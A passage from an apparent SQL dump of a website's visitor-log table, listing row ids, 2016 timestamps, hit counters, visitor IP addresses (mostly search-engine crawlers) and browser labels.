0,'66.249.78.164',''),(43245,1465480511,2,0,2,0,'66.249.78.171',''),(43246,1465480892,1,0,1,0,'66.249.78.178',''),(43247,1465481179,1,1,0,0,'91.196.178.163','chrome'),(43248,1465481763,1,0,1,0,'66.249.78.164',''),(43249,1465482505,3,0,3,0,'66.249.78.171',''),(43250,1465482625,1,1,0,0,'91.196.178.68','chrome'),(43251,1465482950,1,0,1,0,'66.249.78.143',''),(43252,1465483588,2,0,2,0,'66.249.78.178',''),(43253,1465483876,1,1,0,0,'193.93.217.47','firefox'),(43254,1465483896,1,0,1,0,'66.249.69.170',''),(43255,1465484254,1,0,1,0,'66.249.78.164',''),(43256,1465484841,1,0,1,0,'66.249.78.171',''),(43257,1465485798,1,0,1,0,'66.249.78.178',''),(43258,1465486410,2,0,2,0,'66.249.78.164',''),(43259,1465486460,1,1,0,0,'94.179.246.43','firefox'),(43260,1465486585,1,1,0,0,'91.196.178.103','chrome'),(43261,1465486932,1,0,1,0,'66.249.66.183',''),(43262,1465487263,1,0,1,0,'66.249.78.171',''),(43263,1465488020,1,0,1,0,'66.249.78.178',''),(43264,1465488691,2,0,2,0,'66.249.78.164',''),(43265,1465489692,1,1,0,0,'94.179.246.43','firefox'),(43266,1465489834,4,0,4,0,'66.249.78.178',''),(43267,1465489896,1,0,1,0,'66.249.78.171',''),(43268,1465490635,1,1,0,0,'37.54.20.178','other'),(43269,1465490670,1,1,0,0,'130.193.50.34','other'),(43270,1465491105,1,0,1,0,'66.249.69.175',''),(43271,1465491338,2,0,2,0,'66.249.78.171',''),(43272,1465491511,3,0,3,0,'66.249.78.164',''),(43273,1465491713,1,1,0,0,'141.0.14.130','other'),(43274,1465491767,1,0,1,0,'66.249.66.177',''),(43275,1465491841,1,0,1,0,'66.249.66.188',''),(43276,1465492913,1,0,1,0,'66.249.78.136',''),(43277,1465492958,1,1,0,0,'66.249.78.171','chrome'),(43278,1465493178,1,0,1,0,'66.249.78.178',''),(43279,1465493450,2,0,2,0,'66.249.78.164',''),(43280,1465493459,104,104,0,0,'69.30.201.98','other'),(43281,1465493624,1,1,0,0,'178.140.231.7','chrome'),(43282,1465493625,1,1,0,0,'176.193.109.226','firefox'),(43283,1465493626,1,1,0,0,'95.25.128.25','chrome'),(43284,1465493628,1,1,0,0,'46.242.78.131','chrome'),(43285,1465493630,1,1,0,0,'109.173.59.141','chrome'),(43286,1465494175,1,0,1,0,'66.249.78.178',''),(43287,1465494351,2,1,1,0,'66.249.78.178',''),(43288,1465494511,1,1,0,0,'141.8.183.25','other'),(43289,1465494615,1,0,1,0,'66.249.78.143',''),(43290,1465494668,1,0,1,0,'66.249.78.136',''),(43291,1465494748,3,0,3,0,'66.249.78.164',''),(43292,1465494768,3,0,3,0,'66.249.78.171',''),(43293,1465495457,2,0,2,0,'66.249.78.178',''),(43294,1465496189,1,0,1,0,'66.249.78.164',''),(43295,1465496311,1,0,1,0,'66.249.66.180',''),(43296,1465496414,1,0,1,0,'66.249.66.177',''),(43297,1465496843,1,1,0,0,'66.249.78.178','chrome'),(43298,1465497610,2,0,2,0,'66.249.69.170',''),(43299,1465498626,1,0,1,0,'66.249.78.164',''),(43300,1465498676,1,1,0,0,'91.196.178.166','firefox'),(43301,1465499400,1,1,0,0,'91.196.178.168','chrome'),(43302,1465500256,2,0,2,0,'66.249.78.136',''),(43303,1465500291,1,0,1,0,'66.249.75.199',''),(43304,1465500751,1,0,1,0,'66.249.66.185',''),(43305,1465501800,1,0,1,0,'66.249.66.180',''),(43306,1465501881,2,0,2,0,'66.249.78.164',''),(43307,1465501889,1,0,1,0,'66.249.78.171',''),(43308,1465502115,1,0,1,0,'66.249.78.178',''),(43309,1465502689,1,0,1,0,'66.249.66.177',''),(43310,1465503042,1,0,1,0,'66.249.78.178',''),(43311,1465503169,3,0,3,0,'66.249.78.164',''),(43312,1465504170,1,1,0,0,'194.60.77.172','chrome'),(43313,1465504306,1,1,0,0,'157.55.39.210','other'),(43314,1465504457,1,0,1,0,'66.249.66.180',''),(43315,1465504473,1,0,1,0,'66.249.78.164',''),(43316,1465504704,1,0,1,0,'66.249.75.247',''),(43317,1465505036,1,0,1,0,'66.249.75.199',''),(43318,1465506587,1,0,1,0,'66.249.66.177',''),(43319,1465507096,3,0,3,0,'66.249.78.178',''),(43320,1465507559,3,0,3,0,'66.249.78.164',''),(43321,1465507612,2,0,2,0,'66.249.78.171',''),(43322,1465507741,2,0,2,0,'66.249.78.136',''),(43323,1465508193,2,0,2,0,'66.249.78.178',''),(43324,1465508663,1,0,1,0,'66.249.75.231',''),(43325,1465508815,1,0,1,0,'66.249.78.171',''),(43326,1465509180,1,0,1,0,'66.249.78.178',''),(43327,1465510265,1,0,1,0,'66.249.78.164',''),(43328,1465511014,1,0,1,0,'66.249.78.171',''),(43329,1465511389,2,0,2,0,'66.249.78.178',''),(43330,1465511765,1,0,1,0,'66.249.78.164',''),(43331,1465512778,2,0,2,0,'66.249.78.143',''),(43332,1465512906,2,0,2,0,'66.249.78.164',''),(43333,1465513112,1,0,1,0,'66.249.78.171',''),(43334,1465513939,1,0,1,0,'66.249.66.180',''),(43335,1465514554,1,0,1,0,'66.249.78.178',''),(43336,1465514658,2,0,2,0,'66.249.66.177',''),(43337,1465514846,2,0,2,0,'66.249.78.164',''),(43338,1465515267,1,0,1,0,'66.249.78.171',''),(43339,1465516420,1,0,1,0,'66.249.78.171',''),(43340,1465516848,1,0,1,0,'66.249.66.183',''),(43341,1465518432,1,0,1,0,'66.249.66.177',''),(43342,1465518861,1,0,1,0,'66.249.78.171',''),(43343,1465519317,1,0,1,0,'66.249.78.150',''),(43344,1465519712,1,0,1,0,'66.249.78.136',''),(43345,1465519812,3,0,3,0,'66.249.78.164',''),(43346,1465520177,2,0,2,0,'66.249.78.178',''),(43347,1465520418,1,0,1,0,'66.249.66.185',''),(43348,1465520433,1,0,1,0,'66.249.75.191',''),(43349,1465521063,3,0,3,0,'66.249.78.171',''),(43350,1465521421,1,0,1,0,'66.249.66.182',''),(43351,1465521456,1,0,1,0,'66.249.66.183',''),(43352,1465521622,1,1,0,0,'157.55.39.28','other'),(43353,1465521726,2,0,2,0,'66.249.78.178',''),(43354,1465522281,1,0,1,0,'66.249.78.143',''),(43355,1465522840,2,0,2,0,'66.249.78.171',''),(43356,1465523094,1,0,1,0,'66.249.78.178',''),(43357,1465523686,1,1,0,0,'207.46.13.46','other'),(43358,1465523950,2,0,2,0,'66.249.78.171',''),(43359,1465524697,1,0,1,0,'66.249.78.178',''),(43360,1465525200,1,0,1,0,'66.249.78.164',''),(43361,1465525350,1,0,1,0,'66.249.66.183',''),(43362,1465525480,1,0,1,0,'66.249.66.180',''),(43363,1465526324,1,0,1,0,'66.249.78.150',''),(43364,1465526746,1,0,1,0,'66.249.78.178',''),(43365,1465526807,1,0,1,0,'66.249.78.171',''),(43366,1465527871,1,0,1,0,'66.249.75.231',''),(43367,1465528119,1,0,1,0,'66.249.78.150',''),(43368,1465528134,1,0,1,0,'66.249.78.178',''),(43369,1465528300,1,0,1,0,'66.249.78.240',''),(43370,1465528576,2,0,2,0,'66.249.78.164',''),(43371,1465528768,1,0,1,0,'66.249.78.171',''),(43372,1465528972,1,1,0,0,'91.121.181.101','other'),(43373,1465529567,2,0,2,0,'66.249.78.143',''),(43374,1465529579,1,0,1,0,'66.249.78.164',''),(43375,1465529817,1,0,1,0,'66.249.78.150',''),(43376,1465529932,1,0,1,0,'66.249.78.178',''),(43377,1465529954,1,0,1,0,'66.249.78.171',''),(43378,1465530636,1,0,1,0,'66.249.78.136',''),(43379,1465530909,2,0,2,0,'66.249.78.171',''),(43380,1465531158,1,1,0,0,'130.193.50.34','other'),(43381,1465531319,1,1,0,0,'141.8.183.25','other'),(43382,1465531855,1,0,1,0,'66.249.78.150',''),(43383,1465532157,1,1,0,0,'141.8.183.19','other'),(43384,1465532781,1,0,1,0,'66.249.78.164',''),(43385,1465533237,1,0,1,0,'66.249.78.171',''),(43386,1465533844,3,0,3,0,'66.249.78.178',''),(43387,1465534254,2,0,2,0,'66.249.78.164',''),(43388,1465535777,1,0,1,0,'66.249.78.164',''),(43389,1465535780,3,0,3,0,'66.249.78.178',''),(43390,1465535902,3,0,3,0,'66.249.78.171',''),(43391,1465535989,1,1,0,0,'91.196.178.68','firefox'),(43392,1465536026,2,0,2,0,'66.249.78.150',''),(43393,1465536336,1,0,1,0,'66.249.66.177',''),(43394,1465536643,1,0,1,0,'66.249.75.231',''),(43395,1465536946,1,1,0,0,'91.196.178.69','firefox'),(43396,1465537046,2,0,2,0,'66.249.66.180',''),(43397,1465537368,1,0,1,0,'66.249.78.171',''),(43398,1465537421,1,0,1,0,'66.249.78.164',''),(43399,1465537555,1,1,0,0,'66.249.93.147','chrome'),(43400,1465537597,1,1,0,0,'91.196.178.98','chrome'),(43401,1465538199,1,1,0,0,'66.249.78.171','chrome'),(43402,1465538393,3,0,3,0,'66.249.78.164',''),(43403,1465538698,1,0,1,0,'66.249.75.191',''),(43404,1465538987,1,0,1,0,'66.249.66.180',''),(43405,1465539268,1,1,0,0,'94.179.92.29','firefox'),(43406,1465539294,2,1,1,0,'66.249.78.171',''),(43407,1465539459,1,0,1,0,'66.249.78.178',''),(43408,1465539786,1,1,0,0,'66.249.66.180','chrome'),(43409,1465539807,1,1,0,0,'66.249.78.171','chrome'),(43410,1465540619,1,1,0,0,'91.196.178.100','firefox'),(43411,1465540946,2,0,2,0,'66.249.78.164',''),(43412,1465540968,1,0,1,0,'66.249.66.177',''),(43413,1465541358,2,2,0,0,'91.196.178.69','firefox'),(43414,1465541369,1,0,1,0,'66.249.66.188',''),(43415,1465541537,1,0,1,0,'66.249.78.136',''),(43416,1465541666,1,1,0,0,'91.196.178.100','firefox'),(43417,1465541739,1,0,1,0,'66.249.78.171',''),(43418,1465541804,1,1,0,0,'176.104.187.71','firefox'),(43419,1465542204,1,0,1,0,'66.249.66.180',''),(43420,1465542825,2,0,2,0,'66.249.78.164',''),(43421,1465542954,2,0,2,0,'66.249.78.171',''),(43422,1465542994,1,1,0,0,'91.196.178.69','firefox'),(43423,1465543185,1,1,0,0,'194.110.6.72','firefox'),(43424,1465543373,2,0,2,0,'66.249.78.178',''),(43425,1465543965,1,0,1,0,'66.249.66.177',''),(43426,1465544039,1,0,1,0,'66.249.78.171',''),(43427,1465544929,1,0,1,0,'66.249.78.143',''),(43428,1465544946,1,1,0,0,'91.124.11.39','chrome'),(43429,1465544990,2,0,2,0,'66.249.78.164',''),(43430,1465545548,1,1,0,0,'66.249.78.136','chrome'),(43431,1465545644,2,1,1,0,'66.249.78.164',''),(43432,1465545851,1,0,1,0,'66.249.78.178',''),(43433,1465546172,2,0,2,0,'66.249.78.171',''),(43434,1465546180,1,1,0,0,'91.196.178.69','firefox'),(43435,1465546509,1,1,0,0,'46.201.99.45','chrome'),(43436,1465546527,1,0,1,0,'66.249.78.143',''),(43437,1465546541,1,1,0,0,'130.193.51.79','other'),(43438,1465546701,1,0,1,0,'66.249.66.177',''),(43439,1465547637,1,0,1,0,'66.249.78.164',''),(43440,1465548256,1,0,1,0,'66.249.78.150',''),(43441,1465548845,1,1,0,0,'91.196.178.69','chrome'),(43442,1465549135,1,0,1,0,'66.249.78.143',''),(43443,1465549193,2,0,2,0,'66.249.78.171',''),(43444,1465549226,2,0,2,0,'66.249.78.164',''),(43445,1465549262,1,0,1,0,'66.249.69.175',''),(43446,1465549268,1,1,0,0,'91.196.178.68','chrome'),(43447,1465549412,1,0,1,0,'66.249.78.178',''),(43448,1465550352,1,0,1,0,'66.249.66.183',''),(43449,1465550907,1,0,1,0,'66.249.66.188',''),(43450,1465550975,2,0,2,0,'66.249.78.164',''),(43451,1465552659,1,0,1,0,'66.249.78.171',''),(43452,1465552746,4,0,4,0,'66.249.78.164',''),(43453,1465553324,1,0,1,0,'66.249.69.175',''),(43454,1465553625,1,0,1,0,'66.249.78.171',''),(43455,1465554131,1,0,1,0,'66.249.78.136',''),(43456,1465554239,1,0,1,0,'66.249.78.178',''),(43457,1465554805,2,0,2,0,'66.249.78.171',''),(43458,1465555044,1,0,1,0,'66.249.78.150',''),(43459,1465555102,1,0,1,0,'66.249.69.170',''),(43460,1465555314,1,0,1,0,'66.249.78.178',''),(43461,1465555608,1,1,0,0,'94.179.1.203','chrome'),(43462,1465555631,1,1,0,0,'141.8.142.61','other'),(43463,1465555874,2,0,2,0,'66.249.78.164',''),(43464,1465556539,1,0,1,0,'66.249.78.178',''),(43465,1465556578,1,1,0,0,'94.179.1.203','chrome'),(43466,1465556768,1,1,0,0,'95.134.203.90','chrome'),(43467,1465556788,1,1,0,0,'141.8.142.67','other'),(43468,1465556972,1,1,0,0,'130.180.212.191','firefox'),(43469,1465557051,3,0,3,0,'66.249.78.164',''),(43470,1465557482,1,1,0,0,'91.196.178.71','firefox'),(43471,1465557740,1,0,1,0,'66.249.78.150',''),(43472,1465557914,1,0,1,0,'66.249.78.143',''),(43473,1465557930,1,1,0,0,'78.111.186.212','firefox'),(43474,1465558016,1,0,1,0,'66.249.78.136',''),(43475,1465558056,1,0,1,0,'66.249.66.180',''),(43476,1465558387,1,1,0,0,'93.158.152.84','other'),(43477,1465558422,1,0,1,0,'66.249.78.178',''),(43478,1465559045,2,0,2,0,'66.249.78.164',''),(43479,1465559158,1,0,1,0,'66.249.78.143',''),(43480,1465559260,1,0,1,0,'66.249.66.177',''),(43481,1465559403,1,0,1,0,'66.249.78.178',''),(43482,1465559702,2,0,2,0,'66.249.78.171',''),(43483,1465560125,1,1,0,0,'91.196.178.162','chrome'),(43484,1465560187,1,0,1,0,'66.249.78.164',''),(43485,1465560522,1,0,1,0,'66.249.78.178',''),(43486,1465561106,2,0,2,0,'66.249.78.171',''),(43487,1465561279,1,1,0,0,'141.8.132.41','other'),(43488,1465561473,1,0,1,0,'66.249.69.239',''),(43489,1465561583,2,0,2,0,'66.249.78.178',''),(43490,1465561593,1,1,0,0,'94.179.54.12','firefox'),(43491,1465561772,1,0,1,0,'66.249.78.150',''),(43492,1465562094,1,0,1,0,'66.249.78.164',''),(43493,1465562555,1,0,1,0,'66.249.78.171',''),(43494,1465562624,1,0,1,0,'66.249.78.178',''),(43495,1465563627,1,0,1,0,'66.249.78.150',''),(43496,1465563905,1,0,1,0,'66.249.78.171',''),(43497,1465564245,1,0,1,0,'66.249.78.178',''),(43498,1465565453,3,0,3,0,'66.249.78.171',''),(43499,1465565472,2,0,2,0,'66.249.78.150',''),(43500,1465565509,1,0,1,0,'66.249.66.185',''),(43501,1465565512,1,0,1,0,'66.249.66.182',''),(43502,1465565572,2,0,2,0,'66.249.78.164',''),(43503,1465566328,1,1,0,0,'180.76.15.29','other'),(43504,1465567335,1,1,0,0,'94.179.246.43','firefox'),(43505,1465567541,1,0,1,0,'66.249.78.143',''),(43506,1465567543,5,0,5,0,'66.249.78.136',''),(43507,1465567629,1,0,1,0,'66.249.66.185',''),(43508,1465567645,1,0,1,0,'66.249.78.164',''),(43509,1465568231,2,0,2,0,'66.249.78.178',''),(43510,1465568610,1,1,0,0,'141.8.142.58','other'),(43511,1465568883,2,0,2,0,'66.249.78.171',''),(43512,1465569299,1,0,1,0,'66.249.78.164',''),(43513,1465569612,1,1,0,0,'141.8.183.25','other'),(43514,1465570359,1,0,1,0,'66.249.78.178',''),(43515,1465571222,1,0,1,0,'66.249.78.164',''),(43516,1465571647,2,0,2,0,'66.249.78.171',''),(43517,1465571810,1,1,0,0,'141.8.183.25','other'),(43518,1465572676,1,0,1,0,'66.249.66.177',''),(43519,1465573252,3,0,3,0,'66.249.78.178',''),(43520,1465573584,1,1,0,0,'91.196.178.69','firefox'),(43521,1465573968,1,0,1,0,'66.249.66.183',''),(43522,1465574012,1,1,0,0,'94.179.109.48','firefox'),(43523,1465574030,1,1,0,0,'141.8.142.58','other'),(43524,1465575037,1,0,1,0,'66.249.78.164',''),(43525,1465575171,1,1,0,0,'93.158.152.84','other'),(43526,1465575311,4,4,0,0,'144.76.29.162','other'),(43527,1465575314,2,2,0,0,'130.193.50.34','other'),(43528,1465575317,1,1,0,0,'141.8.132.10','other'),(43529,1465575596,1,1,0,0,'141.8.142.67','other'),(43530,1465575616,1,0,1,0,'66.249.66.177',''),(43531,1465576008,1,1,0,0,'141.8.142.61','other'),(43532,1465576059,2,0,2,0,'66.249.78.150',''),(43533,1465576530,1,0,1,0,'66.249.78.178',''),(43534,1465576854,1,1,0,0,'141.8.142.58','other'),(43535,1465577095,6,6,0,0,'144.76.8.132','other'),(43536,1465577144,1,0,1,0,'66.249.66.185',''),(43537,1465577191,2,0,2,0,'66.249.78.171',''),(43538,1465577644,3,0,3,0,'66.249.78.164',''),(43539,1465577690,1,1,0,0,'130.193.51.19','other'),(43540,1465577721,1,0,1,0,'66.249.78.178',''),(43541,1465579321,2,0,2,0,'66.249.78.150',''),(43542,1465579402,1,0,1,0,'66.249.78.164',''),(43543,1465579774,1,0,1,0,'66.249.78.178',''),(43544,1465580584,1,0,1,0,'66.249.78.143',''),(43545,1465581234,2,0,2,0,'66.249.78.178',''),(43546,1465581295,2,0,2,0,'66.249.78.164',''),(43547,1465581550,1,1,0,0,'82.145.220.234','chrome'),(43548,1465581637,3,0,3,0,'66.249.78.171',''),(43549,1465581812,1,0,1,0,'66.249.66.180',''),(43550,1465582163,1,0,1,0,'66.249.66.183',''),(43551,1465582222,1,1,0,0,'94.179.113.213','chrome'),(43552,1465582384,1,1,0,0,'141.8.142.85','other'),(43553,1465582626,1,1,0,0,'93.158.152.46','other'),(43554,1465582978,1,1,0,0,'5.255.253.26','other'),(43555,1465582979,1,0,1,0,'66.249.78.150',''),(43556,1465583572,1,1,0,0,'93.158.152.26','other'),(43557,1465583794,1,1,0,0,'157.55.39.28','other'),(43558,1465584018,1,0,1,0,'66.249.78.171',''),(43559,1465584772,1,0,1,0,'66.249.75.191',''),(43560,1465585434,1,0,1,0,'66.249.78.164',''),(43561,1465585701,1,0,1,0,'66.249.78.178',''),(43562,1465586189,1,1,0,0,'93.158.152.26','other'),(43563,1465586376,1,1,0,0,'91.196.178.72','chrome'),(43564,1465586628,1,0,1,0,'66.249.78.136',''),(43565,1465586773,3,0,3,0,'66.249.78.178',''),(43566,1465586794,1,0,1,0,'66.249.78.150',''),(43567,1465586877,2,0,2,0,'66.249.78.164',''),(43568,1465587506,1,1,0,0,'193.194.127.217','firefox'),(43569,1465588136,1,0,1,0,'66.249.78.178',''),(43570,1465588349,1,0,1,0,'66.249.66.177',''),(43571,1465588517,1,0,1,0,'66.249.78.171',''),(43572,1465588659,1,0,1,0,'66.249.75.199',''),(43573,1465588847,1,1,0,0,'46.211.153.169','other'),(43574,1465588854,1,1,0,0,'130.193.51.19','other'),(43575,1465589043,1,1,0,0,'46.211.156.30','other'),(43576,1465589050,1,0,1,0,'66.249.78.164',''),(43577,1465590711,1,0,1,0,'66.249.78.234',''),(43578,1465591029,1,1,0,0,'130.193.50.34','other'),(43579,1465591604,1,0,1,0,'66.249.78.178',''),(43580,1465591684,1,1,0,0,'207.46.13.99','other'),(43581,1465591690,1,0,1,0,'66.249.78.171',''),(43582,1465592271,1,0,1,0,'66.249.78.164',''),(43583,1465592546,1,0,1,0,'66.249.78.178',''),(43584,1465593104,1,0,1,0,'66.249.78.171',''),(43585,1465593431,1,0,1,0,'66.249.78.150',''),(43586,1465593553,1,0,1,0,'66.249.78.164',''),(43587,1465594086,1,0,1,0,'66.249.75.207',''),(43588,1465594455,1,0,1,0,'66.249.78.150',''),(43589,1465594488,4,0,4,0,'66.249.78.178',''),(43590,1465595176,1,0,1,0,'66.249.66.183',''),(43591,1465595290,1,0,1,0,'66.249.66.182',''),(43592,1465595310,1,0,1,0,'66.249.66.177',''),(43593,1465595818,1,1,0,0,'207.46.13.166','other'),(43594,1465595861,1,0,1,0,'66.249.78.178',''),(43595,1465596909,1,1,0,0,'141.8.142.61','other'),(43596,1465597272,1,1,0,0,'130.193.50.34','other'),(43597,1465597441,1,0,1,0,'66.249.78.164',''),(43598,1465597648,1,0,1,0,'66.249.78.178',''),(43599,1465598266,1,0,1,0,'66.249.78.171',''),(43600,1465598591,1,0,1,0,'66.249.78.164',''),(43601,1465599061,2,0,2,0,'66.249.78.178',''),(43602,1465599392,1,1,0,0,'141.8.142.58','other'),(43603,1465599560,1,0,1,0,'66.249.75.191',''),(43604,1465599766,2,0,2,0,'66.249.78.164',''),(43605,1465600082,1,1,0,0,'157.55.39.28','other'),(43606,1465600108,1,0,1,0,'66.249.78.178',''),(43607,1465600989,1,0,1,0,'66.249.78.136',''),(43608,1465600999,1,1,0,0,'157.55.39.28','other'),(43609,1465601024,2,0,2,0,'66.249.78.178',''),(43610,1465601045,1,1,0,0,'130.193.51.19','other'),(43611,1465601254,1,1,0,0,'208.91.115.10','chrome'),(43612,1465601615,2,0,2,0,'66.249.78.171',''),(43613,1465601939,1,0,1,0,'66.249.78.143',''),(43614,1465602330,1,1,0,0,'130.193.50.34','other'),(43615,1465602637,1,1,0,0,'77.37.140.222','chrome'),(43616,1465602795,1,1,0,0,'141.8.142.58','other'),(43617,1465602855,1,0,1,0,'66.249.78.171',''),(43618,1465603219,107,107,0,0,'209.126.127.49','other'),(43619,1465603331,300,300,0,0,'77.250.107.12','other'),(43620,1465603340,1,0,1,0,'66.249.78.178',''),(43621,1465603734,1,1,0,0,'77.37.140.222','firefox'),(43622,1465603778,1,0,1,0,'66.249.78.164',''),(43623,1465603956,1,1,0,0,'46.147.127.111','chrome'),(43624,1465604121,1,1,0,0,'95.25.45.224','chrome'),(43625,1465604128,111,111,0,0,'209.126.127.49','other'),(43626,1465604308,1,0,1,0,'66.249.78.178',''),(43627,1465604648,1,1,0,0,'95.220.167.54','chrome'),(43628,1465605036,65,65,0,0,'209.126.127.49','other'),(43629,1465605273,1,1,0,0,'141.8.132.10','other'),(43630,1465605421,1,0,1,0,'66.249.66.183',''),(43631,1465605450,1,0,1,0,'66.249.78.164',''),(43632,1465605720,3,0,3,0,'66.249.78.171',''),(43633,1465606192,1,0,1,0,'66.249.78.178',''),(43634,1465606270,1,0,1,0,'66.249.66.180',''),(43635,1465606777,1,0,1,0,'66.249.78.143',''),(43636,1465607011,1,1,0,0,'141.8.183.19','other'),(43637,1465607224,1,0,1,0,'66.249.66.188',''),(43638,1465607929,1,1,0,0,'141.8.142.58','other'),(43639,1465608612,1,0,1,0,'66.249.73.246',''),(43640,1465609702,1,0,1,0,'66.249.78.178',''),(43641,1465610209,1,1,0,0,'157.55.39.141','other'),(43642,1465610233,1,1,0,0,'130.193.37.7','other'),(43643,1465610272,1,0,1,0,'66.249.78.171',''),(43644,1465610883,1,0,1,0,'66.249.78.143',''),(43645,1465611226,3,0,3,0,'66.249.78.178',''),(43646,1465611408,1,0,1,0,'66.249.78.164',''),(43647,1465611459,1,1,0,0,'130.193.50.34','other'),(43648,1465611818,1,1,0,0,'141.8.142.67','other'),(43649,1465612631,1,0,1,0,'66.249.78.178',''),(43650,1465612656,4,0,4,0,'66.249.78.164',''),(43651,1465613248,1,0,1,0,'66.249.78.150',''),(43652,1465613994,1,0,1,0,'66.249.66.183',''),(43653,1465614564,1,0,1,0,'66.249.78.178',''),(43654,1465614735,1,0,1,0,'66.249.78.164',''),(43655,1465614925,1,1,0,0,'141.8.183.19','other'),(43656,1465615271,1,0,1,0,'66.249.66.182',''),(43657,1465615330,2,0,2,0,'66.249.78.171',''),(43658,1465615892,1,0,1,0,'66.249.78.178',''),(43659,1465615953,1,0,1,0,'66.249.78.136',''),(43660,1465616109,2,0,2,0,'66.249.78.164',''),(43661,1465616398,3,0,3,0,'66.249.78.171',''),(43662,1465617946,2,0,2,0,'66.249.78.164',''),(43663,1465618043,1,1,0,0,'130.193.51.19','other'),(43664,1465618497,2,0,2,0,'66.249.78.171',''),(43665,1465618728,2,0,2,0,'66.249.64.170',''),(43666,1465619428,1,1,0,0,'157.55.39.28','other'),(43667,1465619520,1,0,1,0,'66.249.64.175',''),(43668,1465620946,1,0,1,0,'66.249.64.239',''),(43669,1465622078,1,1,0,0,'94.179.14.124','firefox'),(43670,1465622352,1,0,1,0,'66.249.64.244',''),(43671,1465622391,1,0,1,0,'66.249.64.180',''),(43672,1465622540,1,0,1,0,'66.249.64.175',''),(43673,1465623955,1,0,1,0,'66.249.64.175',''),(43674,1465623958,1,0,1,0,'66.249.64.170',''),(43675,1465624011,1,0,1,0,'66.249.64.239',''),(43676,1465624276,1,1,0,0,'141.8.183.25','other'),(43677,1465625194,4,0,4,0,'66.249.64.175',''),(43678,1465625237,3,0,3,0,'66.249.64.170',''),(43679,1465625693,1,1,0,0,'77.37.137.108','msie'),(43680,1465626319,2,0,2,0,'66.249.64.170',''),(43681,1465626399,1,1,0,0,'46.242.78.44','msie'),(43682,1465626560,1,1,0,0,'37.144.5.59','msie'),(43683,1465626761,1,1,0,0,'176.77.47.46','msie'),(43684,1465627685,3,0,3,0,'66.249.64.170',''),(43685,1465627782,1,0,1,0,'66.249.64.175',''),(43686,1465628298,1,0,1,0,'66.249.64.244',''),(43687,1465628994,2,0,2,0,'66.249.64.180',''),(43688,1465629669,2,0,2,0,'66.249.64.175',''),(43689,1465630163,1,0,1,0,'66.249.64.180',''),(43690,1465630320,1,0,1,0,'66.249.64.170',''),(43691,1465630339,1,1,0,0,'130.193.50.34','other'),(43692,1465631342,1,0,1,0,'66.249.64.249',''),(43693,1465631375,1,0,1,0,'66.249.64.175',''),(43694,1465632164,1,1,0,0,'141.8.183.25','other'),(43695,1465632311,2,0,2,0,'66.249.64.180',''),(43696,1465632701,1,0,1,0,'66.249.64.170',''),(43697,1465632769,1,0,1,0,'66.249.64.175',''),(43698,1465633835,1,0,1,0,'66.249.64.170',''),(43699,1465633843,2,1,1,0,'66.249.64.249',''),(43700,1465634338,1,1,0,0,'66.249.64.170','chrome'),(43701,1465634520,1,1,0,0,'141.8.183.25','other'),(43702,1465634811,1,1,0,0,'104.236.49.128','other'),(43703,1465635086,2,0,2,0,'66.249.64.175',''),(43704,1465635220,1,0,1,0,'66.249.64.180',''),(43705,1465635743,1,1,0,0,'141.8.142.61','other'),(43707,1465635889,1,1,0,0,'130.193.51.19','other'),(43708,1465635905,2,2,0,0,'93.158.152.84','other'),(43709,1465636132,1,1,0,0,'95.133.197.45','chrome'),(43710,1465636327,1,0,1,0,'66.249.64.175',''),(43711,1465636645,1,0,1,0,'66.249.64.249',''),(43712,1465636840,1,0,1,0,'66.249.64.180',''),(43713,1465636846,1,0,1,0,'66.249.64.239',''),(43714,1465637011,1,1,0,0,'157.55.39.141','other'),(43715,1465637377,2,0,2,0,'66.249.64.175',''),(43716,1465637486,1,1,0,0,'141.8.183.25','other'),(43717,1465637544,1,1,0,0,'66.249.93.153','chrome'),(43718,1465638046,1,0,1,0,'66.249.64.180',''),(43719,1465638709,1,0,1,0,'66.249.64.244',''),(43720,1465639176,1,1,0,0,'94.179.246.43','firefox'),(43721,1465639277,1,0,1,0,'66.249.64.180',''),(43722,1465639321,1,1,0,0,'130.193.50.34','other'),(43723,1465639346,1,0,1,0,'66.249.64.170',''),(43724,1465640728,1,0,1,0,'66.249.64.180',''),(43725,1465640744,5,0,5,0,'66.249.64.170',''),(43726,1465640963,3,0,3,0,'66.249.64.175',''),(43727,1465641293,1,1,0,0,'141.8.183.25','other'),(43728,1465641907,1,0,1,0,'66.249.64.180',''),(43729,1465642262,1,0,1,0,'66.249.64.175',''),(43730,1465643399,1,1,0,0,'141.8.183.25','other'),(43731,1465644870,1,0,1,0,'66.249.64.175',''),(43732,1465644903,4,0,4,0,'66.249.64.170',''),(43733,1465644904,1,0,1,0,'66.249.64.249',''),(43734,1465645232,1,1,0,0,'130.193.51.19','other'),(43735,1465645459,1,1,0,0,'157.55.39.141','other'),(43736,1465646223,1,0,1,0,'66.249.64.170',''),(43737,1465646956,1,1,0,0,'46.200.8.210','firefox'),(43738,1465647295,1,1,0,0,'207.46.13.99','other'),(43739,1465647431,1,1,0,0,'136.243.5.87','other'),(43740,1465647600,1,1,0,0,'130.193.50.34','other'),(43741,1465648288,2,0,2,0,'66.249.64.180',''),(43742,1465648443,2,1,1,0,'66.249.64.249',''),(43743,1465649662,1,0,1,0,'66.249.64.239',''),(43744,1465650299,2,0,2,0,'66.249.64.175',''),(43745,1465650375,2,0,2,0,'66.249.64.170',''),(43746,1465651135,1,1,0,0,'213.5.192.129','firefox'),(43747,1465651345,1,0,1,0,'66.249.64.180',''),(43748,1465651486,1,1,0,0,'46.200.8.210','firefox'),(43749,1465651490,1,0,1,0,'66.249.64.170',''),(43750,1465651823,1,0,1,0,'66.249.64.175',''),(43751,1465652986,2,0,2,0,'66.249.64.175',''),(43752,1465653039,1,0,1,0,'66.249.64.170',''),(43753,1465653337,1,0,1,0,'66.249.75.199',''),(43754,1465653346,3,0,3,0,'66.249.75.191',''),(43755,1465654790,1,0,1,0,'66.249.75.231',''),(43756,1465654894,1,1,0,0,'180.76.15.150','other'),(43757,1465654989,1,0,1,0,'66.249.75.207',''),(43758,1465655252,2,0,2,0,'66.249.75.191',''),(43759,1465656158,1,0,1,0,'66.249.75.191',''),(43760,1465656173,1,0,1,0,'66.249.75.199',''),(43761,1465657129,1,0,1,0,'66.249.75.199',''),(43762,1465657412,1,0,1,0,'66.249.75.191',''),(43763,1465657485,2,0,2,0,'66.249.75.207',''),(43764,1465657526,1,1,0,0,'91.196.178.104','other'),(43765,1465658753,1,0,1,0,'66.249.75.199',''),(43766,1465659752,1,1,0,0,'141.8.142.58','other'),(43767,1465660417,1,0,1,0,'66.249.75.191',''),(43768,1465660429,1,0,1,0,'66.249.75.239',''),(43769,1465660819,2,0,2,0,'66.249.75.207',''),(43770,1465661415,1,0,1,0,'66.249.75.191',